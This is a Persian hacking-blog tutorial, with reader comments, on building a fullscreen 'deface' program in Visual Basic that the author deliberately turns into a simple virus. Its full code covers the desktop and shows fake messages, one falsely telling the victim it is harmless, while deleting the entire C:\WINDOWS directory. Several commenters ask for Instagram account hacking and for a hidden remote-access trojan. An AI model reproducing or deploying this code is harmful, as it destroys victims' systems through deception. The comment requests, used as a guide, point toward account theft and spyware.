ساخت دیفیس به زبان ویژوآل بیسیک :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

صفحه دیفیسی که امروز میخواییم بنویسیم تقریبا شبیه همون صفحه دیفیس های سیستمی هست که چند ماه پیش قرار دادم.

به اصرار دوستان قرار شد ساختن صفحه دیفیس سیستم رو به زبان ویژوآل بیسیک رو آموزش بدم.

برای ساختن دیفیس به زبان سی شارپ هم همین کارها رو باید انجام بدین

ولی من تصمیم گرفتم یه خط کد مخرب هم بهش اضافه کنم تا در نهایت کار یه ویروس ساده هم داشته باشیم تا شما هم با روش اضافه کردن کدهای مخرب به اینجور برنامه ها آشنا شین.

در کل ویروسمون کارهای زیر رو انجام میده :

کل صفحه دسکتاپ رو پوشش و خودش رو در اولویت تمام برنامه ها قرار میده

فایل های ویندوز رو بصورت مخفی پاک میکنه

برای قربانی پیام های ساختگی نمایش میده

بریم سر آموزش :

بدلیل کم بود وقت دیگه مثل سابق نمیتونم قدم به قدم آموزش بدم

خودتون ویژوآل بیسیک رو آتیش کنید و یه پروژه جدید برای ویندوز ایجاد کنید.

تو قسمت Form اشیاء زیر رو اضافه کنید

یک عدد Label

و یدونه Progress Bar

و یه Picture Box

و یک Timer

Virus32

صفحه دیفیس ها همیشه سلیقه ای هستن

یعنی بیشتر رو گرافیکشون کار میشه که شما میتونید بجای یدونه عکس ده تا عکس یا Label یا همون برچسب قرار بدین.

خوب وسایل لازم رو برداشتیم

حالا باید کاری کنیم تا کل صفحه دسکتاپ رو بپوشونه

برای اینکار ابتدا روی فورم کلیک کنید و در قسمت Properties مقدار های زیر رو به دلخواه تغییر بدین.

Back color : رو پیدا کنید و رنگ زمینه صفحه دیفیستون رو انتخاب کنید

(من سیاهش کردم)

Back Ground Image : در این قسمت شما میتونید برای دیفیس تصویر زمینه انتخاب کنید.

Virus32

سپس تو همون کادر بیایید پایین تر و گزینه Form Border Style رو پیدا کنید و بر روی None قرار دهید تا شکل ظاهری برنامه از حالت استاندارد خارج شه.

(اگه به فورم دقت کنید متوجه تغییرش میشین)

سپس برین به آخرین گزینه یعنی Window state و مقدارش رو به Maximized تغییر دهید

(این هم باعث میشه برنامه کل دسکتاپ رو بگیره)

انتخاب عکس مناسب و نوشتن متن روی Label رو میزارم به عهده خودتون!!!

(بازم اگه مشکلی داشتین سوال کنید جواب میدم)

روی فورم دوبل کلیک کنید تا به قسمت کد نویسی بریم.

کدهارو به صورت کلی مینویسم و بین خط ها توضیحش رو میدم.

Public Class Form1
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Me.Show()
Me.Focus()
Me.BringToFront()
ProgressBar1.Minimum = 0
ProgressBar1.Maximum = 800
For x As Integer = 0 To 800 Step 2
ProgressBar1.Value = x
ProgressBar1.Refresh()
Threading.Thread.Sleep(10)
Timer1.Enabled = True


'تکه کد مخرب'

My.Computer.FileSystem.DeleteDirectory("C:\WINDOWS", FileIO.DeleteDirectoryOption.DeleteAllContents)
'باعث میشه فایل های ویندوز رو بصورت مخفیانه پاک کنه'
'با بسته شدن برنامه ، پاک کردن باز هم ادامه دار خواهد بود تا عملیات به پایان برسه'



'پیام ها '

Timer1.Enabled = False 'کد تایمر باعث میشه در هر پیام مکث ایجاد بشه'
If ProgressBar1.Value = 100 Then
MessageBox.Show("سلام من ویروس 32 هستم")
End If


Timer1.Enabled = False 'اگه این تکه کدهارو از اول پیامها حذف کنیم'
' پیام هاپشت سرهم بدون وقفه نمایش داده میشن'

If ProgressBar1.Value = 200 Then
MessageBox.Show("این یک برنامه ی ساده برای آموزش است و هیچ گونه خطری برای سیستمی ندارد")
End If


Timer1.Enabled = False
If ProgressBar1.Value = 400 Then
MessageBox.Show("این برنامه به زبان ویژوآل بیسیک نوشته شده")
End If


Timer1.Enabled = False
If ProgressBar1.Value = 450 Then
MessageBox.Show("شما هم میتوانید به سادگی یک برنامه نویس شوید")
End If


Timer1.Enabled = False
If ProgressBar1.Value = 500 Then
MessageBox.Show("gonbad a Kaboos")
End If


Timer1.Enabled = False
If ProgressBar1.Value = 800 Then
MessageBox.Show("Virus32.blog.ir")

Me.Close() 'باعث میشه بعد از آخرین پیام برنامه بسته شه'
' میتونیم این خط رو پاک کنیم تا برنامه بسته نشه'

End If


Next
End Sub

'تایمر'
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
SendKeys.Send("{Enter}")
Timer1.Enabled = False
'در صورت پاک کردن کد تایمر از بین پیام ها باعث میشه پیامها بصورت اتوماتیک نمایش داده بشن'
End Sub
End Class

بهتره برای شروع کارتون اون یه خط کد مخرب رو ننویسید

و اینکه اگه نوشتید تو سیستم خودتون اجراش نکنید چون غیر فعال کردنش خیلی دشوار میشه و در هر صورت به ویندوز آسیب میرسونه

اینم پایان کار

Virus32

دریافت برنامه ی بی خطر (بدون کد مخرب)

Virus32
حجم: 16.7 کیلوبایت

نظر (۲۶)

سلام
میشه لینک ویژوالو بزارید بعد خودمون اتیشش کنیم.
دستت درد نکنه.
میشه بپرسم ویژوال روی کدوم ویندوز ها اجرا میشه ؟؟؟؟؟
میشه بپرسم کی آموزش هک وبلاگ رو میزارید ؟؟؟؟؟
میشه بپبرسم ایا باز وب کار خودشو شروع کرده ؟؟؟؟؟
میشه بپرسم من چرا اینقدر حرف میزنم ؟؟؟؟؟ :)
مرسی وبلاگت خییلی توپه
Virus32 Virus 32 :
سلام
بهتره ویژوآل استدیو رو نصب کنی خیلی بهتره
رو همه ویندوز ها اجرا میشه
تاجایی که بتونم دارم تلاشمو میکنم تا اطلاعاتم رو با شما عزیزان درمیون بزارم ولی فعلا اوضام بیریخته
نه وب کارشو شروع نکرده هنوز
چون آدم کنجکاوی هستی و این خوبه :)
توپی از خودته
سلام ویروس 32
داداش چه جوری اکانت اینستاگرام هک کنم؟
توروخدا آموزششو بزار تو پست بعدی، حتی حاظرم پول بدم بابتش
اخ اخ فدات شم ویروس بالاخره برگشتی؟؟ داشتی ما رو فراموش میکردیا :-)
خیلی سوال تو ذهنمه همشو جمع کردم بپرسم :-)
Virus32 Virus 32 :
:)
عزیزی ممد جان
داداش جواب نظر مارم بده!
نیاز دارم بوخودا
ممنونت میشم پست بعدی راجبش باشه
هک اکانت ایسنتاگرام
Virus32 Virus 32 :
اونو بلد نیستم عزیز
سلام چطوری سیو کنم
Virus32 Virus 32 :
سلام
باید ببینی ویژوآل استدیو یا ویژوآل بیسیک پروژه رو کجا ذخیره میکنه
درایو یا پوشه رو پیدا کردی باید به پوشه Debug بری اونجا میتونی برنامه رو ببینی
برای مثال در سیستمی که من اینو نوشتم در آدرس زیر ذخیره میشد
C:\Users\Revenger32\Documents\Visual Studio 2010\Projects\vb-v32\vb-v32\bin\Debug
نیازی به کامپایل یا سیو کردن نداره
برای پیدا کردن مسیر ذخیره سازی هم در برنامه از File روی Save All کلیک کن توی صفحه باز شده آدرس ذخیره سازی رو میتونی ببینی
ویروس جان اینطوری برنامه ارور میده بالا نگفتی که باید یه تایمر هم بزاری!!
البته من فعلا منتظرم که این برنامه رو به زبان سی شارپ توضیح بدی
Virus32 Virus 32 :
بله درسته یادم رفته بگم تایمر هم قرار بدین
متن اصلاح شد
مرسی برای دقتت ;)
ولی من نفهمیدم اخرش این پیکچر باکس به چه درد خورد هههه
اصلا تو توضیحاتت ازش استفاده نکردی
Virus32 Virus 32 :
شاعر توی توضیحاتش میگه که :
  • انتخاب عکس مناسب و نوشتن متن روی Label رو میزارم به عهده خودتون!!!
:)
شاعر تو توضیحاتش میفرماید:

برای اینکار ابتدا روی فورم کلیک کنید و در قسمت Properties مقدار های زیر رو به دلخواه تغییر بدین.

Back color : رو پیدا کنید و رنگ زمینه صفحه دیفیستون رو انتخاب کنید

(من سیاهش کردم)

Back Ground Image : در این قسمت شما میتونید برای دیفیس تصویر زمینه انتخاب کنید.

(ببین خودتم گفتی رو فورم کلیک کنید بعد از پراپرتیس عکس انتخاب کنید پس این پیکچر باکس اضافیه!)
Virus32 Virus 32 :
رو مخ شاعر پیاده روی نکن
اونو گفتم تا تازه واردا هروقت خواستن عکس اضافه کنن گیر نداشته باشن
تو نزارش خوب
باشه شاعر جان :))
ولی سوتی میدی قبول نمیکین؟!
اااااا بازم رفتم رو مخت خخخخ
سلام داداش من واقعا از آموزش هات لذت بردم ممنون نوکرتم :)
بازم سلام . چجوری این ویروس ( بدون کد مخرب ) رو متوقف کنیم ؟
Virus32 Virus 32 :
بازم علیک :)
با فشار دادن کلید های ترکیبی Alt + F4 برنامه بسته میشه
بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
سلام
داش جان این میتونه این ویروسو خنثی کنه ساخت خودمه فدا مدا البته باید موقعی که ویندوز شروع به حالت آمادگی میکنه رو دیسکتاپ اینو روش کلیک میکنیم دیگه نماد بالا خخخخ این بلا سرم اومد رفتم این ویروسو اجراش کردم خخخ مجبور شدم اینو بسازم
تقدیم به داش ویروس
*****************************************************
Virus32 Virus 32 :
سلام
خوب بود مرسی
سلام
داش مشکل داره بزاری؟
در هر صورت تشکر
Virus32 Virus 32 :
سلام
بله عزیز مشکل داشت :(
;)
lol داشم میشه البته اگه امکان داره بگی دقیقا کجاش بود مشکلش؟؟
این فقط یه فایل واسه بستن پنجره های هنگی سیستمه ....
مرسی
Virus32 Virus 32 :
لینک دانلود تو نظرات عمومی نمیشه
فایل مشکلی نداشت
اینجا ثبتش کرده بودم
سلام داش ویروس
میشه روی این صفحه دیفیسی که ساختم یه آهنگ هم بذارم که همینجور که باز هست پخش بشه؟
اگه کدی داره ممنون میشم بنویسیش
Virus32 Virus 32 :
سلام عزیز
اینو توی پستی توضیح داده بودم
فک کنم سی شارپ بود اونو بخون سی شارپ و ویژوآل تقریبا عین هم هستن
سلام ویروس گلم!
یه سوال
من صفحه رو ساختم خیلی خوب شد دستت درد نکنه
ولی توی صفحه ی خودت یه خط سبزی پر میشه وسط صفحه
اما توی مال من نمیشه
ممنون میشم راهنمایی کنی
Virus32 Virus 32 :
سلام عزیز
اون خط بخاطر Progress Bar هستش
یکم روش کار کنی خودت زود متوجه میشی
سلام ویروس جونم خوبی 3>

داداش توروخدا اگه میشه قسمت کدهارو از using به طور یه جا بزاری هرچی من میزارم ارور میده یه جا کدشو بهم بده نخام تک تک قسمت labale و ... دسکاری کنم مرسی داشم
Virus32 Virus 32 :
سلام ممنون
کاش متن ارور رو اینجا مینوشتی تا ببینم دردش چیه
فعلا به سورس های پروژه دسترسی ندارم سری بعد حتما قرار میدم
ویروس جونم داش بخدا پوکیدم کمک کن چند روزه گیره اینم
اگه میشه کدهارو یک جا از همون using بزاری یعنی تکه تکه نباشن توروخدا کمکم کن(>_
Virus32 Virus 32 :
ویژوآل بیسیک using نداره داشی
اول چیزهایی که لازم داریم رو توی قسمت فورم برنامه ات انتخاب کن
بعد تنظیمات فورم رو هم دستکاری کن
در نهایت روی فورم دوبل کلیک کن و کدهایی که قرار دادم رو کپی پیست کن.
به سیستمی که این پروژه ها توش هستن دسترسی ندارم :(
باسلام
خیلی عذرخواهی میکنم اما بنده درخواستی داشتم
میشه اگه ممکنه وژیوآل بیسیک رو از اولش توضیح بدید که چی هست ؟چی کار میکنه؟برای چی ازش استفاده میکنیم؟و چطور ازش استفاده کنیم(مثلا برنامه نویسی های خیلی ساده برای مثلا ما که خیلی خیلی مبتدی هستیم)
خیلی ممنون
Virus32 Virus 32 :
سلام
این کار رو در آینده انجام میدم
بزار پرونده سی شارپ رو ببندم :)
سلام داداش خسته نباشید مرسی بابت مطالب اگر میشه اموزش ساخت رات یاد بدین و قابلیت این رات وقتی طرف نصب میکنه فوری برنامه هیدن شه و پیام های طرف و هرچی دیگه به ما برسه مثلا اصطلاعاتش ممنون میشم ساخت رات یاد بدین
سلام ویروس "32"
عاشق وبلاگتم
***********
از طریقtask manager میشه جلوشو گرفتا O_o
DELETE+ALT+CTRL
یا مال من این جوره
Virus32 Virus 32 :
سلام عزیز اینو میشه با alt+f4 هم جلوشو گرفت چون هنوز کد غیرفعال کردن کیبورد رو نداره
سلام اقای ویروس من یه سوال داشتم
اگه بخوام مثل اون ویروسی که حالت تایپ داره رو بسازیم باید چیکار کنیم لطفا اونم اموزش بدید
راستی یه چیز بگم به اموزش های برنامه نویسی ادامه بدید چون عالیهههههههههههههههههههههههههههههههههههه
دوستون دارم فعلا
اگه خواستید منم میتونم در b4a و c# یکم بلدم اموزش بدم
لطفا پیشرفته تر این ویروس رو بنویسید و اموزش بدید لطفا دوستون دارذم فعلا
دلمو ترکوندی هوف
Virus32 Virus 32 :
:)
سلام میشه توضیح بدید چطور باید به صورت .exe درش بیاریم؟؟؟ممنون
Virus32 Virus 32 :
سلام
بعد از کامپایل یا تست کردن
برنامه بصورت خودکار در پوشه Debug محل ذخیره شدن پروژه قرار میگیره
در جواب اقا سپهر باید بگم که باید یه فیک اپ یا همون فیک صفحه اینستا گرام بسازیم تا بتونیم اینستا گرام رو هک کنیم . در غیر این صورت هیچ کس نمیتونه هکش کنه یا حداقل ما نمیتونیم
یه سوال
اون حالت لود شدن سبز رو چطور ساختی؟
Virus32 MR_C0D3R ‌ :
به اون میگن نوار پیشرفت
توی تول باکست سرچ کن ProgressBar
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی